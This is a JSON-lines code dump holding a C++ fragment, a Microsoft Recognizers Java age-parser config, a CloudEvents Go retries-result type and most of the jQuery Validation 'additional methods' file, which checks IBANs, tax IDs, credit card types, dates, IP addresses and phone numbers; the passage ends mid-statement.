RINOK(SetProperty(name, value));\n }\n\n return S_OK;\n COM_TRY_END\n}\n\n}}\n"} {"text": "package com.microsoft.recognizers.text.numberwithunit.english.parsers;\n\nimport com.microsoft.recognizers.text.Culture;\nimport com.microsoft.recognizers.text.CultureInfo;\nimport com.microsoft.recognizers.text.numberwithunit.english.extractors.AgeExtractorConfiguration;\n\npublic class AgeParserConfiguration extends EnglishNumberWithUnitParserConfiguration {\n\n public AgeParserConfiguration() {\n this(new CultureInfo(Culture.English));\n }\n\n public AgeParserConfiguration(CultureInfo cultureInfo) {\n super(cultureInfo);\n\n this.bindDictionary(AgeExtractorConfiguration.AgeSuffixList);\n }\n}\n"} {"text": "package http\n\nimport (\n\t\"fmt\"\n\t\"time\"\n\n\t\"github.com/cloudevents/sdk-go/v2/protocol\"\n)\n\n// NewRetriesResult returns a http RetriesResult that should be used as\n// a transport.Result without retries\nfunc NewRetriesResult(result protocol.Result, retries int, startTime time.Time, attempts []protocol.Result) protocol.Result {\n\trr := 
&RetriesResult{\n\t\tResult: result,\n\t\tRetries: retries,\n\t\tDuration: time.Since(startTime),\n\t}\n\tif len(attempts) > 0 {\n\t\trr.Attempts = attempts\n\t}\n\treturn rr\n}\n\n// RetriesResult wraps the fields required to make adjustments for http Responses.\ntype RetriesResult struct {\n\t// The last result\n\tprotocol.Result\n\n\t// Retries is the number of times the request was tried\n\tRetries int\n\n\t// Duration records the time spent retrying. Exclude the successful request (if any)\n\tDuration time.Duration\n\n\t// Attempts of all failed requests. Exclude last result.\n\tAttempts []protocol.Result\n}\n\n// make sure RetriesResult implements error.\nvar _ error = (*RetriesResult)(nil)\n\n// Is returns if the target error is a RetriesResult type checking target.\nfunc (e *RetriesResult) Is(target error) bool {\n\treturn protocol.ResultIs(e.Result, target)\n}\n\n// Error returns the string that is formed by using the format string with the\n// provided args.\nfunc (e *RetriesResult) Error() string {\n\tif e.Retries == 0 {\n\t\treturn e.Result.Error()\n\t}\n\treturn fmt.Sprintf(\"%s (%dx)\", e.Result.Error(), e.Retries)\n}\n"} {"text": "/*!\n * jQuery Validation Plugin v1.14.0\n *\n * http://jqueryvalidation.org/\n *\n * Copyright (c) 2015 Jörn Zaefferer\n * Released under the MIT license\n */\n(function( factory ) {\n\tif ( typeof define === \"function\" && define.amd ) {\n\t\tdefine( [\"jquery\", \"./jquery.validate\"], factory );\n\t} else {\n\t\tfactory( jQuery );\n\t}\n}(function( $ ) {\n\n(function() {\n\n\tfunction stripHtml(value) {\n\t\t// remove html tags and space chars\n\t\treturn value.replace(/<.[^<>]*?>/g, \" \").replace(/ | /gi, \" \")\n\t\t// remove punctuation\n\t\t.replace(/[.(),;:!?%#$'\\\"_+=\\/\\-“”’]*/g, \"\");\n\t}\n\n\t$.validator.addMethod(\"maxWords\", function(value, element, params) {\n\t\treturn this.optional(element) || stripHtml(value).match(/\\b\\w+\\b/g).length <= params;\n\t}, $.validator.format(\"Please enter {0} words or less.\"));\n\n\t$.validator.addMethod(\"minWords\", function(value, element, params) {\n\t\treturn this.optional(element) || stripHtml(value).match(/\\b\\w+\\b/g).length >= params;\n\t}, $.validator.format(\"Please enter at least {0} words.\"));\n\n\t$.validator.addMethod(\"rangeWords\", function(value, element, params) {\n\t\tvar valueStripped = stripHtml(value),\n\t\t\tregex = /\\b\\w+\\b/g;\n\t\treturn this.optional(element) || valueStripped.match(regex).length >= params[0] && valueStripped.match(regex).length <= params[1];\n\t}, $.validator.format(\"Please enter between {0} and {1} words.\"));\n\n}());\n\n// Accept a value from a file input based on a required mimetype\n$.validator.addMethod(\"accept\", function(value, element, param) {\n\t// Split mime on commas in case we have multiple types we can accept\n\tvar typeParam = typeof param === \"string\" ? 
param.replace(/\\s/g, \"\").replace(/,/g, \"|\") : \"image/*\",\n\toptionalValue = this.optional(element),\n\ti, file;\n\n\t// Element is optional\n\tif (optionalValue) {\n\t\treturn optionalValue;\n\t}\n\n\tif ($(element).attr(\"type\") === \"file\") {\n\t\t// If we are using a wildcard, make it regex friendly\n\t\ttypeParam = typeParam.replace(/\\*/g, \".*\");\n\n\t\t// Check if the element has a FileList before checking each file\n\t\tif (element.files && element.files.length) {\n\t\t\tfor (i = 0; i < element.files.length; i++) {\n\t\t\t\tfile = element.files[i];\n\n\t\t\t\t// Grab the mimetype from the loaded file, verify it matches\n\t\t\t\tif (!file.type.match(new RegExp( \"\\\\.?(\" + typeParam + \")$\", \"i\"))) {\n\t\t\t\t\treturn false;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\t// Either return true because we've validated each file, or because the\n\t// browser does not support element.files and the FileList feature\n\treturn true;\n}, $.validator.format(\"Please enter a value with a valid mimetype.\"));\n\n$.validator.addMethod(\"alphanumeric\", function(value, element) {\n\treturn this.optional(element) || /^\\w+$/i.test(value);\n}, \"Letters, numbers, and underscores only please\");\n\n/*\n * Dutch bank account numbers (not 'giro' numbers) have 9 digits\n * and pass the '11 check'.\n * We accept the notation with spaces, as that is common.\n * acceptable: 123456789 or 12 34 56 789\n */\n$.validator.addMethod(\"bankaccountNL\", function(value, element) {\n\tif (this.optional(element)) {\n\t\treturn true;\n\t}\n\tif (!(/^[0-9]{9}|([0-9]{2} ){3}[0-9]{3}$/.test(value))) {\n\t\treturn false;\n\t}\n\t// now '11 check'\n\tvar account = value.replace(/ /g, \"\"), // remove spaces\n\t\tsum = 0,\n\t\tlen = account.length,\n\t\tpos, factor, digit;\n\tfor ( pos = 0; pos < len; pos++ ) {\n\t\tfactor = len - pos;\n\t\tdigit = account.substring(pos, pos + 1);\n\t\tsum = sum + factor * digit;\n\t}\n\treturn sum % 11 === 0;\n}, \"Please specify a valid bank account number\");\n\n$.validator.addMethod(\"bankorgiroaccountNL\", function(value, element) {\n\treturn this.optional(element) ||\n\t\t\t($.validator.methods.bankaccountNL.call(this, value, element)) ||\n\t\t\t($.validator.methods.giroaccountNL.call(this, value, element));\n}, \"Please specify a valid bank or giro account number\");\n\n/**\n * BIC is the business identifier code (ISO 9362). This BIC check is not a guarantee for authenticity.\n *\n * BIC pattern: BBBBCCLLbbb (8 or 11 characters long; bbb is optional)\n *\n * BIC definition in detail:\n * - First 4 characters - bank code (only letters)\n * - Next 2 characters - ISO 3166-1 alpha-2 country code (only letters)\n * - Next 2 characters - location code (letters and digits)\n * a. shall not start with '0' or '1'\n * b. 
second character must be a letter ('O' is not allowed) or one of the following digits ('0' for test (therefore not allowed), '1' for passive participant and '2' for active participant)\n * - Last 3 characters - branch code, optional (shall not start with 'X' except in case of 'XXX' for primary office) (letters and digits)\n */\n$.validator.addMethod(\"bic\", function(value, element) {\n return this.optional( element ) || /^([A-Z]{6}[A-Z2-9][A-NP-Z1-2])(X{3}|[A-WY-Z0-9][A-Z0-9]{2})?$/.test( value );\n}, \"Please specify a valid BIC code\");\n\n/*\n * Código de identificación fiscal ( CIF ) is the tax identification code for Spanish legal entities\n * Further rules can be found in Spanish on http://es.wikipedia.org/wiki/C%C3%B3digo_de_identificaci%C3%B3n_fiscal\n */\n$.validator.addMethod( \"cifES\", function( value ) {\n\t\"use strict\";\n\n\tvar num = [],\n\t\tcontrolDigit, sum, i, count, tmp, secondDigit;\n\n\tvalue = value.toUpperCase();\n\n\t// Quick format test\n\tif ( !value.match( \"((^[A-Z]{1}[0-9]{7}[A-Z0-9]{1}$|^[T]{1}[A-Z0-9]{8}$)|^[0-9]{8}[A-Z]{1}$)\" ) ) {\n\t\treturn false;\n\t}\n\n\tfor ( i = 0; i < 9; i++ ) {\n\t\tnum[ i ] = parseInt( value.charAt( i ), 10 );\n\t}\n\n\t// Algorithm for checking CIF codes\n\tsum = num[ 2 ] + num[ 4 ] + num[ 6 ];\n\tfor ( count = 1; count < 8; count += 2 ) {\n\t\ttmp = ( 2 * num[ count ] ).toString();\n\t\tsecondDigit = tmp.charAt( 1 );\n\n\t\tsum += parseInt( tmp.charAt( 0 ), 10 ) + ( secondDigit === \"\" ? 0 : parseInt( secondDigit, 10 ) );\n\t}\n\n\t/* The first (position 1) is a letter following the following criteria:\n\t *\tA. Corporations\n\t *\tB. LLCs\n\t *\tC. General partnerships\n\t *\tD. Companies limited partnerships\n\t *\tE. Communities of goods\n\t *\tF. Cooperative Societies\n\t *\tG. Associations\n\t *\tH. Communities of homeowners in horizontal property regime\n\t *\tJ. Civil Societies\n\t *\tK. Old format\n\t *\tL. Old format\n\t *\tM. Old format\n\t *\tN. Nonresident entities\n\t *\tP. Local authorities\n\t *\tQ. Autonomous bodies, state or not, and the like, and congregations and religious institutions\n\t *\tR. Congregations and religious institutions (since 2008 ORDER EHA/451/2008)\n\t *\tS. Organs of State Administration and regions\n\t *\tV. Agrarian Transformation\n\t *\tW. Permanent establishments of non-resident in Spain\n\t */\n\tif ( /^[ABCDEFGHJNPQRSUVW]{1}/.test( value ) ) {\n\t\tsum += \"\";\n\t\tcontrolDigit = 10 - parseInt( sum.charAt( sum.length - 1 ), 10 );\n\t\tvalue += controlDigit;\n\t\treturn ( num[ 8 ].toString() === String.fromCharCode( 64 + controlDigit ) || num[ 8 ].toString() === value.charAt( value.length - 1 ) );\n\t}\n\n\treturn false;\n\n}, \"Please specify a valid CIF number.\" );\n\n/*\n * Brazillian CPF number (Cadastrado de Pessoas Físicas) is the equivalent of a Brazilian tax registration number.\n * CPF numbers have 11 digits in total: 9 numbers followed by 2 check numbers that are being used for validation.\n */\n$.validator.addMethod(\"cpfBR\", function(value) {\n\t// Removing special characters from value\n\tvalue = value.replace(/([~!@#$%^&*()_+=`{}\\[\\]\\-|\\\\:;'<>,.\\/? 
])+/g, \"\");\n\n\t// Checking value to have 11 digits only\n\tif (value.length !== 11) {\n\t\treturn false;\n\t}\n\n\tvar sum = 0,\n\t\tfirstCN, secondCN, checkResult, i;\n\n\tfirstCN = parseInt(value.substring(9, 10), 10);\n\tsecondCN = parseInt(value.substring(10, 11), 10);\n\n\tcheckResult = function(sum, cn) {\n\t\tvar result = (sum * 10) % 11;\n\t\tif ((result === 10) || (result === 11)) {result = 0;}\n\t\treturn (result === cn);\n\t};\n\n\t// Checking for dump data\n\tif (value === \"\" ||\n\t\tvalue === \"00000000000\" ||\n\t\tvalue === \"11111111111\" ||\n\t\tvalue === \"22222222222\" ||\n\t\tvalue === \"33333333333\" ||\n\t\tvalue === \"44444444444\" ||\n\t\tvalue === \"55555555555\" ||\n\t\tvalue === \"66666666666\" ||\n\t\tvalue === \"77777777777\" ||\n\t\tvalue === \"88888888888\" ||\n\t\tvalue === \"99999999999\"\n\t) {\n\t\treturn false;\n\t}\n\n\t// Step 1 - using first Check Number:\n\tfor ( i = 1; i <= 9; i++ ) {\n\t\tsum = sum + parseInt(value.substring(i - 1, i), 10) * (11 - i);\n\t}\n\n\t// If first Check Number (CN) is valid, move to Step 2 - using second Check Number:\n\tif ( checkResult(sum, firstCN) ) {\n\t\tsum = 0;\n\t\tfor ( i = 1; i <= 10; i++ ) {\n\t\t\tsum = sum + parseInt(value.substring(i - 1, i), 10) * (12 - i);\n\t\t}\n\t\treturn checkResult(sum, secondCN);\n\t}\n\treturn false;\n\n}, \"Please specify a valid CPF number\");\n\n/* NOTICE: Modified version of Castle.Components.Validator.CreditCardValidator\n * Redistributed under the the Apache License 2.0 at http://www.apache.org/licenses/LICENSE-2.0\n * Valid Types: mastercard, visa, amex, dinersclub, enroute, discover, jcb, unknown, all (overrides all other settings)\n */\n$.validator.addMethod(\"creditcardtypes\", function(value, element, param) {\n\tif (/[^0-9\\-]+/.test(value)) {\n\t\treturn false;\n\t}\n\n\tvalue = value.replace(/\\D/g, \"\");\n\n\tvar validTypes = 0x0000;\n\n\tif (param.mastercard) {\n\t\tvalidTypes |= 0x0001;\n\t}\n\tif (param.visa) {\n\t\tvalidTypes |= 0x0002;\n\t}\n\tif (param.amex) {\n\t\tvalidTypes |= 0x0004;\n\t}\n\tif (param.dinersclub) {\n\t\tvalidTypes |= 0x0008;\n\t}\n\tif (param.enroute) {\n\t\tvalidTypes |= 0x0010;\n\t}\n\tif (param.discover) {\n\t\tvalidTypes |= 0x0020;\n\t}\n\tif (param.jcb) {\n\t\tvalidTypes |= 0x0040;\n\t}\n\tif (param.unknown) {\n\t\tvalidTypes |= 0x0080;\n\t}\n\tif (param.all) {\n\t\tvalidTypes = 0x0001 | 0x0002 | 0x0004 | 0x0008 | 0x0010 | 0x0020 | 0x0040 | 0x0080;\n\t}\n\tif (validTypes & 0x0001 && /^(5[12345])/.test(value)) { //mastercard\n\t\treturn value.length === 16;\n\t}\n\tif (validTypes & 0x0002 && /^(4)/.test(value)) { //visa\n\t\treturn value.length === 16;\n\t}\n\tif (validTypes & 0x0004 && /^(3[47])/.test(value)) { //amex\n\t\treturn value.length === 15;\n\t}\n\tif (validTypes & 0x0008 && /^(3(0[012345]|[68]))/.test(value)) { //dinersclub\n\t\treturn value.length === 14;\n\t}\n\tif (validTypes & 0x0010 && /^(2(014|149))/.test(value)) { //enroute\n\t\treturn value.length === 15;\n\t}\n\tif (validTypes & 0x0020 && /^(6011)/.test(value)) { //discover\n\t\treturn value.length === 16;\n\t}\n\tif (validTypes & 0x0040 && /^(3)/.test(value)) { //jcb\n\t\treturn value.length === 16;\n\t}\n\tif (validTypes & 0x0040 && /^(2131|1800)/.test(value)) { //jcb\n\t\treturn value.length === 15;\n\t}\n\tif (validTypes & 0x0080) { //unknown\n\t\treturn true;\n\t}\n\treturn false;\n}, \"Please enter a valid credit card number.\");\n\n/**\n * Validates currencies with any given symbols by @jameslouiz\n * Symbols can be optional or required. 
Symbols required by default\n *\n * Usage examples:\n * currency: [\"£\", false] - Use false for soft currency validation\n * currency: [\"$\", false]\n * currency: [\"RM\", false] - also works with text based symbols such as \"RM\" - Malaysia Ringgit etc\n *\n * \n *\n * Soft symbol checking\n * currencyInput: {\n * currency: [\"$\", false]\n * }\n *\n * Strict symbol checking (default)\n * currencyInput: {\n * currency: \"$\"\n * //OR\n * currency: [\"$\", true]\n * }\n *\n * Multiple Symbols\n * currencyInput: {\n * currency: \"$,£,¢\"\n * }\n */\n$.validator.addMethod(\"currency\", function(value, element, param) {\n var isParamString = typeof param === \"string\",\n symbol = isParamString ? param : param[0],\n soft = isParamString ? true : param[1],\n regex;\n\n symbol = symbol.replace(/,/g, \"\");\n symbol = soft ? symbol + \"]\" : symbol + \"]?\";\n regex = \"^[\" + symbol + \"([1-9]{1}[0-9]{0,2}(\\\\,[0-9]{3})*(\\\\.[0-9]{0,2})?|[1-9]{1}[0-9]{0,}(\\\\.[0-9]{0,2})?|0(\\\\.[0-9]{0,2})?|(\\\\.[0-9]{1,2})?)$\";\n regex = new RegExp(regex);\n return this.optional(element) || regex.test(value);\n\n}, \"Please specify a valid currency\");\n\n$.validator.addMethod(\"dateFA\", function(value, element) {\n\treturn this.optional(element) || /^[1-4]\\d{3}\\/((0?[1-6]\\/((3[0-1])|([1-2][0-9])|(0?[1-9])))|((1[0-2]|(0?[7-9]))\\/(30|([1-2][0-9])|(0?[1-9]))))$/.test(value);\n}, $.validator.messages.date);\n\n/**\n * Return true, if the value is a valid date, also making this formal check dd/mm/yyyy.\n *\n * @example $.validator.methods.date(\"01/01/1900\")\n * @result true\n *\n * @example $.validator.methods.date(\"01/13/1990\")\n * @result false\n *\n * @example $.validator.methods.date(\"01.01.1900\")\n * @result false\n *\n * @example \n * @desc Declares an optional input element whose value must be a valid date.\n *\n * @name $.validator.methods.dateITA\n * @type Boolean\n * @cat Plugins/Validate/Methods\n */\n$.validator.addMethod(\"dateITA\", function(value, element) {\n\tvar check = false,\n\t\tre = /^\\d{1,2}\\/\\d{1,2}\\/\\d{4}$/,\n\t\tadata, gg, mm, aaaa, xdata;\n\tif ( re.test(value)) {\n\t\tadata = value.split(\"/\");\n\t\tgg = parseInt(adata[0], 10);\n\t\tmm = parseInt(adata[1], 10);\n\t\taaaa = parseInt(adata[2], 10);\n\t\txdata = new Date(Date.UTC(aaaa, mm - 1, gg, 12, 0, 0, 0));\n\t\tif ( ( xdata.getUTCFullYear() === aaaa ) && ( xdata.getUTCMonth () === mm - 1 ) && ( xdata.getUTCDate() === gg ) ) {\n\t\t\tcheck = true;\n\t\t} else {\n\t\t\tcheck = false;\n\t\t}\n\t} else {\n\t\tcheck = false;\n\t}\n\treturn this.optional(element) || check;\n}, $.validator.messages.date);\n\n$.validator.addMethod(\"dateNL\", function(value, element) {\n\treturn this.optional(element) || /^(0?[1-9]|[12]\\d|3[01])[\\.\\/\\-](0?[1-9]|1[012])[\\.\\/\\-]([12]\\d)?(\\d\\d)$/.test(value);\n}, $.validator.messages.date);\n\n// Older \"accept\" file extension method. Old docs: http://docs.jquery.com/Plugins/Validation/Methods/accept\n$.validator.addMethod(\"extension\", function(value, element, param) {\n\tparam = typeof param === \"string\" ? 
param.replace(/,/g, \"|\") : \"png|jpe?g|gif\";\n\treturn this.optional(element) || value.match(new RegExp(\"\\\\.(\" + param + \")$\", \"i\"));\n}, $.validator.format(\"Please enter a value with a valid extension.\"));\n\n/**\n * Dutch giro account numbers (not bank numbers) have max 7 digits\n */\n$.validator.addMethod(\"giroaccountNL\", function(value, element) {\n\treturn this.optional(element) || /^[0-9]{1,7}$/.test(value);\n}, \"Please specify a valid giro account number\");\n\n/**\n * IBAN is the international bank account number.\n * It has a country - specific format, that is checked here too\n */\n$.validator.addMethod(\"iban\", function(value, element) {\n\t// some quick simple tests to prevent needless work\n\tif (this.optional(element)) {\n\t\treturn true;\n\t}\n\n\t// remove spaces and to upper case\n\tvar iban = value.replace(/ /g, \"\").toUpperCase(),\n\t\tibancheckdigits = \"\",\n\t\tleadingZeroes = true,\n\t\tcRest = \"\",\n\t\tcOperator = \"\",\n\t\tcountrycode, ibancheck, charAt, cChar, bbanpattern, bbancountrypatterns, ibanregexp, i, p;\n\n\t// check the country code and find the country specific format\n\tcountrycode = iban.substring(0, 2);\n\tbbancountrypatterns = {\n\t\t\"AL\": \"\\\\d{8}[\\\\dA-Z]{16}\",\n\t\t\"AD\": \"\\\\d{8}[\\\\dA-Z]{12}\",\n\t\t\"AT\": \"\\\\d{16}\",\n\t\t\"AZ\": \"[\\\\dA-Z]{4}\\\\d{20}\",\n\t\t\"BE\": \"\\\\d{12}\",\n\t\t\"BH\": \"[A-Z]{4}[\\\\dA-Z]{14}\",\n\t\t\"BA\": \"\\\\d{16}\",\n\t\t\"BR\": \"\\\\d{23}[A-Z][\\\\dA-Z]\",\n\t\t\"BG\": \"[A-Z]{4}\\\\d{6}[\\\\dA-Z]{8}\",\n\t\t\"CR\": \"\\\\d{17}\",\n\t\t\"HR\": \"\\\\d{17}\",\n\t\t\"CY\": \"\\\\d{8}[\\\\dA-Z]{16}\",\n\t\t\"CZ\": \"\\\\d{20}\",\n\t\t\"DK\": \"\\\\d{14}\",\n\t\t\"DO\": \"[A-Z]{4}\\\\d{20}\",\n\t\t\"EE\": \"\\\\d{16}\",\n\t\t\"FO\": \"\\\\d{14}\",\n\t\t\"FI\": \"\\\\d{14}\",\n\t\t\"FR\": \"\\\\d{10}[\\\\dA-Z]{11}\\\\d{2}\",\n\t\t\"GE\": \"[\\\\dA-Z]{2}\\\\d{16}\",\n\t\t\"DE\": \"\\\\d{18}\",\n\t\t\"GI\": \"[A-Z]{4}[\\\\dA-Z]{15}\",\n\t\t\"GR\": \"\\\\d{7}[\\\\dA-Z]{16}\",\n\t\t\"GL\": \"\\\\d{14}\",\n\t\t\"GT\": \"[\\\\dA-Z]{4}[\\\\dA-Z]{20}\",\n\t\t\"HU\": \"\\\\d{24}\",\n\t\t\"IS\": \"\\\\d{22}\",\n\t\t\"IE\": \"[\\\\dA-Z]{4}\\\\d{14}\",\n\t\t\"IL\": \"\\\\d{19}\",\n\t\t\"IT\": \"[A-Z]\\\\d{10}[\\\\dA-Z]{12}\",\n\t\t\"KZ\": \"\\\\d{3}[\\\\dA-Z]{13}\",\n\t\t\"KW\": \"[A-Z]{4}[\\\\dA-Z]{22}\",\n\t\t\"LV\": \"[A-Z]{4}[\\\\dA-Z]{13}\",\n\t\t\"LB\": \"\\\\d{4}[\\\\dA-Z]{20}\",\n\t\t\"LI\": \"\\\\d{5}[\\\\dA-Z]{12}\",\n\t\t\"LT\": \"\\\\d{16}\",\n\t\t\"LU\": \"\\\\d{3}[\\\\dA-Z]{13}\",\n\t\t\"MK\": \"\\\\d{3}[\\\\dA-Z]{10}\\\\d{2}\",\n\t\t\"MT\": \"[A-Z]{4}\\\\d{5}[\\\\dA-Z]{18}\",\n\t\t\"MR\": \"\\\\d{23}\",\n\t\t\"MU\": \"[A-Z]{4}\\\\d{19}[A-Z]{3}\",\n\t\t\"MC\": \"\\\\d{10}[\\\\dA-Z]{11}\\\\d{2}\",\n\t\t\"MD\": \"[\\\\dA-Z]{2}\\\\d{18}\",\n\t\t\"ME\": \"\\\\d{18}\",\n\t\t\"NL\": \"[A-Z]{4}\\\\d{10}\",\n\t\t\"NO\": \"\\\\d{11}\",\n\t\t\"PK\": \"[\\\\dA-Z]{4}\\\\d{16}\",\n\t\t\"PS\": \"[\\\\dA-Z]{4}\\\\d{21}\",\n\t\t\"PL\": \"\\\\d{24}\",\n\t\t\"PT\": \"\\\\d{21}\",\n\t\t\"RO\": \"[A-Z]{4}[\\\\dA-Z]{16}\",\n\t\t\"SM\": \"[A-Z]\\\\d{10}[\\\\dA-Z]{12}\",\n\t\t\"SA\": \"\\\\d{2}[\\\\dA-Z]{18}\",\n\t\t\"RS\": \"\\\\d{18}\",\n\t\t\"SK\": \"\\\\d{20}\",\n\t\t\"SI\": \"\\\\d{15}\",\n\t\t\"ES\": \"\\\\d{20}\",\n\t\t\"SE\": \"\\\\d{20}\",\n\t\t\"CH\": \"\\\\d{5}[\\\\dA-Z]{12}\",\n\t\t\"TN\": \"\\\\d{20}\",\n\t\t\"TR\": \"\\\\d{5}[\\\\dA-Z]{17}\",\n\t\t\"AE\": \"\\\\d{3}\\\\d{16}\",\n\t\t\"GB\": \"[A-Z]{4}\\\\d{14}\",\n\t\t\"VG\": \"[\\\\dA-Z]{4}\\\\d{16}\"\n\t};\n\n\tbbanpattern = 
bbancountrypatterns[countrycode];\n\t// As new countries will start using IBAN in the\n\t// future, we only check if the countrycode is known.\n\t// This prevents false negatives, while almost all\n\t// false positives introduced by this, will be caught\n\t// by the checksum validation below anyway.\n\t// Strict checking should return FALSE for unknown\n\t// countries.\n\tif (typeof bbanpattern !== \"undefined\") {\n\t\tibanregexp = new RegExp(\"^[A-Z]{2}\\\\d{2}\" + bbanpattern + \"$\", \"\");\n\t\tif (!(ibanregexp.test(iban))) {\n\t\t\treturn false; // invalid country specific format\n\t\t}\n\t}\n\n\t// now check the checksum, first convert to digits\n\tibancheck = iban.substring(4, iban.length) + iban.substring(0, 4);\n\tfor (i = 0; i < ibancheck.length; i++) {\n\t\tcharAt = ibancheck.charAt(i);\n\t\tif (charAt !== \"0\") {\n\t\t\tleadingZeroes = false;\n\t\t}\n\t\tif (!leadingZeroes) {\n\t\t\tibancheckdigits += \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\".indexOf(charAt);\n\t\t}\n\t}\n\n\t// calculate the result of: ibancheckdigits % 97\n\tfor (p = 0; p < ibancheckdigits.length; p++) {\n\t\tcChar = ibancheckdigits.charAt(p);\n\t\tcOperator = \"\" + cRest + \"\" + cChar;\n\t\tcRest = cOperator % 97;\n\t}\n\treturn cRest === 1;\n}, \"Please specify a valid IBAN\");\n\n$.validator.addMethod(\"integer\", function(value, element) {\n\treturn this.optional(element) || /^-?\\d+$/.test(value);\n}, \"A positive or negative non-decimal number please\");\n\n$.validator.addMethod(\"ipv4\", function(value, element) {\n\treturn this.optional(element) || /^(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)\\.(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)\\.(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)\\.(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)$/i.test(value);\n}, \"Please enter a valid IP v4 address.\");\n\n$.validator.addMethod(\"ipv6\", function(value, element) {\n\treturn this.optional(element) || /^((([0-9A-Fa-f]{1,4}:){7}[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){6}:[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){5}:([0-9A-Fa-f]{1,4}:)?[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){4}:([0-9A-Fa-f]{1,4}:){0,2}[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){3}:([0-9A-Fa-f]{1,4}:){0,3}[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){2}:([0-9A-Fa-f]{1,4}:){0,4}[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){6}((\\b((25[0-5])|(1\\d{2})|(2[0-4]\\d)|(\\d{1,2}))\\b)\\.){3}(\\b((25[0-5])|(1\\d{2})|(2[0-4]\\d)|(\\d{1,2}))\\b))|(([0-9A-Fa-f]{1,4}:){0,5}:((\\b((25[0-5])|(1\\d{2})|(2[0-4]\\d)|(\\d{1,2}))\\b)\\.){3}(\\b((25[0-5])|(1\\d{2})|(2[0-4]\\d)|(\\d{1,2}))\\b))|(::([0-9A-Fa-f]{1,4}:){0,5}((\\b((25[0-5])|(1\\d{2})|(2[0-4]\\d)|(\\d{1,2}))\\b)\\.){3}(\\b((25[0-5])|(1\\d{2})|(2[0-4]\\d)|(\\d{1,2}))\\b))|([0-9A-Fa-f]{1,4}::([0-9A-Fa-f]{1,4}:){0,5}[0-9A-Fa-f]{1,4})|(::([0-9A-Fa-f]{1,4}:){0,6}[0-9A-Fa-f]{1,4})|(([0-9A-Fa-f]{1,4}:){1,7}:))$/i.test(value);\n}, \"Please enter a valid IP v6 address.\");\n\n$.validator.addMethod(\"lettersonly\", function(value, element) {\n\treturn this.optional(element) || /^[a-z]+$/i.test(value);\n}, \"Letters only please\");\n\n$.validator.addMethod(\"letterswithbasicpunc\", function(value, element) {\n\treturn this.optional(element) || /^[a-z\\-.,()'\"\\s]+$/i.test(value);\n}, \"Letters or punctuation only please\");\n\n$.validator.addMethod(\"mobileNL\", function(value, element) {\n\treturn this.optional(element) || /^((\\+|00(\\s|\\s?\\-\\s?)?)31(\\s|\\s?\\-\\s?)?(\\(0\\)[\\-\\s]?)?|0)6((\\s|\\s?\\-\\s?)?[0-9]){8}$/.test(value);\n}, \"Please specify a valid mobile number\");\n\n/* For UK phone functions, do the following server side processing:\n * Compare original input with 
this RegEx pattern:\n * ^\\(?(?:(?:00\\)?[\\s\\-]?\\(?|\\+)(44)\\)?[\\s\\-]?\\(?(?:0\\)?[\\s\\-]?\\(?)?|0)([1-9]\\d{1,4}\\)?[\\s\\d\\-]+)$\n * Extract $1 and set $prefix to '+44' if $1 is '44', otherwise set $prefix to '0'\n * Extract $2 and remove hyphens, spaces and parentheses. Phone number is combined $prefix and $2.\n * A number of very detailed GB telephone number RegEx patterns can also be found at:\n * http://www.aa-asterisk.org.uk/index.php/Regular_Expressions_for_Validating_and_Formatting_GB_Telephone_Numbers\n */\n$.validator.addMethod(\"mobileUK\", function(phone_number, element) {\n\tphone_number = phone_number.replace(/\\(|\\)|\\s+|-/g, \"\");\n\treturn this.optional(element) || phone_number.length > 9 &&\n\t\tphone_number.match(/^(?:(?:(?:00\\s?|\\+)44\\s?|0)7(?:[1345789]\\d{2}|624)\\s?\\d{3}\\s?\\d{3})$/);\n}, \"Please specify a valid mobile number\");\n\n/*\n * The número de identidad de extranjero ( NIE )is a code used to identify the non-nationals in Spain\n */\n$.validator.addMethod( \"nieES\", function( value ) {\n\t\"use strict\";\n\n\tvalue = value.toUpperCase();\n\n\t// Basic format test\n\tif ( !value.match( \"((^[A-Z]{1}[0-9]{7}[A-Z0-9]{1}$|^[T]{1}[A-Z0-9]{8}$)|^[0-9]{8}[A-Z]{1}$)\" ) ) {\n\t\treturn false;\n\t}\n\n\t// Test NIE\n\t//T\n\tif ( /^[T]{1}/.test( value ) ) {\n\t\treturn ( value[ 8 ] === /^[T]{1}[A-Z0-9]{8}$/.test( value ) );\n\t}\n\n\t//XYZ\n\tif ( /^[XYZ]{1}/.test( value ) ) {\n\t\treturn (\n\t\t\tvalue[ 8 ] === \"TRWAGMYFPDXBNJZSQVHLCKE\".charAt(\n\t\t\t\tvalue.replace( \"X\", \"0\" )\n\t\t\t\t\t.replace( \"Y\", \"1\" )\n\t\t\t\t\t.replace( \"Z\", \"2\" )\n\t\t\t\t\t.substring( 0, 8 ) % 23\n\t\t\t)\n\t\t);\n\t}\n\n\treturn false;\n\n}, \"Please specify a valid NIE number.\" );\n\n/*\n * The Número de Identificación Fiscal ( NIF ) is the way tax identification used in Spain for individuals\n */\n$.validator.addMethod( \"nifES\", function( value ) {\n\t\"use strict\";\n\n\tvalue = value.toUpperCase();\n\n\t// Basic format test\n\tif ( !value.match(\"((^[A-Z]{1}[0-9]{7}[A-Z0-9]{1}$|^[T]{1}[A-Z0-9]{8}$)|^[0-9]{8}[A-Z]{1}$)\") ) {\n\t\treturn false;\n\t}\n\n\t// Test NIF\n\tif ( /^[0-9]{8}[A-Z]{1}$/.test( value ) ) {\n\t\treturn ( \"TRWAGMYFPDXBNJZSQVHLCKE\".charAt( value.substring( 8, 0 ) % 23 ) === value.charAt( 8 ) );\n\t}\n\t// Test specials NIF (starts with K, L or M)\n\tif ( /^[KLM]{1}/.test( value ) ) {\n\t\treturn ( value[ 8 ] === String.fromCharCode( 64 ) );\n\t}\n\n\treturn false;\n\n}, \"Please specify a valid NIF number.\" );\n\njQuery.validator.addMethod( \"notEqualTo\", function( value, element, param ) {\n\treturn this.optional(element) || !$.validator.methods.equalTo.call( this, value, element, 